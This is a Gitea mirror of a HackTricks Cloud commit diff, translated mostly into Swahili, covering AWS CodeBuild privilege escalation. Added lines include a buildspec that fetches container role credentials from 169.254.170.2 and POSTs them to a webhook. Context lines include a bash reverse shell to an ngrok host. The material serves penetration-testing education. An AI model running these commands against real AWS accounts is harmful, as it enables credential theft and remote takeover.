gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-11 20:45:21 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

Browse Source
This commit is contained in:
Translator
2025-01-08 20:44:45 +00:00
parent a9bee6a3a4
commit 243dc8ca1e
1 changed files with 40 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files

46
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
View File

@@ -61,7 +61,7 @@ aws codebuild start-build-batch --project <project-name> --buildspec-override fi
**Kumbuka**: Tofauti kati ya amri hizi mbili ni kwamba:
- `StartBuild` inachochea kazi moja ya kujenga kwa kutumia `buildspec.yml` maalum.
- `StartBuildBatch` inakuwezesha kuanzisha kundi la ujenzi, kwa mipangilio tata zaidi (kama kuendesha ujenzi kadhaa kwa wakati mmoja).
- `StartBuildBatch` inakuwezesha kuanzisha kundi la ujenzi, ikiwa na mipangilio tata zaidi (kama kuendesha ujenzi kadhaa kwa wakati mmoja).
**Athari Zinazoweza Kutokea:** Privesc moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa.
@@ -133,6 +133,40 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat
# Start a build with the new project
aws codebuild start-build --project-name reverse-shell-project
```
{{#endtab }}
{{#tab name="Example3" }}
```bash
# Generated by ex16x41, tested
# Create a hook.json file with command to send output from curl credentials URI to your webhook address
{
"name": "user-project-1",
"source": {
"type": "NO_SOURCE",
"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - curl \"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\" | curl -X POST -d @- WEBHOOK URL\n"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER",
"image": "public.ecr.aws/codebuild/amazonlinux2-x86_64-standard:4.0",
"computeType": "BUILD_GENERAL1_SMALL"
},
"serviceRole": "ARN-OF-TARGET-ROLE"
}
# Create a new CodeBuild project with the hook.json file
aws codebuild create-project --cli-input-json file:///tmp/hook.json
# Start a build with the new project
aws codebuild start-build --project-name user-project-1
# Get Credentials output to webhook address
Wait a few seconds to maybe a couple minutes and view the POST request with data of credentials to pivot from
```
{{#endtab }}
{{#endtabs }}
@@ -142,11 +176,11 @@ aws codebuild start-build --project-name reverse-shell-project
> [!WARNING]
> Katika **konteina ya Codebuild** faili `/codebuild/output/tmp/env.sh` ina kila mabadiliko ya env yanayohitajika kufikia **akiba ya metadata**.
> Faili hii ina **mabadiliko ya env `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** ambayo ina **njia ya URL** ya kufikia akiba. Itakuwa kama hii `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
> Faili hii ina **mabadiliko ya env `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** ambayo ina **njia ya URL** ya kufikia akiba. Itakuwa kitu kama hii `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
> Ongeza hiyo kwenye URL **`http://169.254.170.2/`** na utaweza kudump akiba ya jukumu.
> Zaidi ya hayo, pia ina **mabadiliko ya env `ECS_CONTAINER_METADATA_URI`** ambayo ina URL kamili ya kupata **habari za metadata kuhusu konteina**.
> Zaidi ya hayo, pia ina **mabadiliko ya env `ECS_CONTAINER_METADATA_URI`** ambayo ina URL kamili ya kupata **taarifa za metadata kuhusu konteina**.
### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
@@ -268,7 +302,7 @@ aws codebuild start-build-batch --project-name codebuild-demo-project
### SSM
Kuwa na **idhini ya kutosha kuanzisha kikao cha ssm** inawezekana kupata **ndani ya mradi wa Codebuild** unaojengwa.
Kuwa na **idhini za kutosha kuanzisha kikao cha ssm** inawezekana kupata **ndani ya mradi wa Codebuild** unaojengwa.
Mradi wa codebuild utahitaji kuwa na breakpoint:
@@ -317,13 +351,13 @@ build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
```
**Impact:** Privesc ya moja kwa moja kwa jukumu linalotumiwa na mfanyakazi wa AWS CodeBuild ambalo mara nyingi lina mamlaka ya juu.
**Impact:** Moja kwa moja privesc kwa jukumu lililotumiwa na mfanyakazi wa AWS CodeBuild ambalo mara nyingi lina mamlaka ya juu.
> [!WARNING]
> Kumbuka kwamba buildspec inaweza kutarajiwa kuwa katika muundo wa zip, hivyo mshambuliaji atahitaji kupakua, kufungua, kubadilisha `buildspec.yml` kutoka kwenye saraka ya mzizi, kuzipa tena na kupakia.
Maelezo zaidi yanaweza kupatikana [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/).
**Potential Impact:** Privesc ya moja kwa moja kwa majukumu ya AWS Codebuild yaliyoambatanishwa.
**Potential Impact:** Moja kwa moja privesc kwa majukumu ya AWS Codebuild yaliyoambatanishwa.
{{#include ../../../banners/hacktricks-training.md}}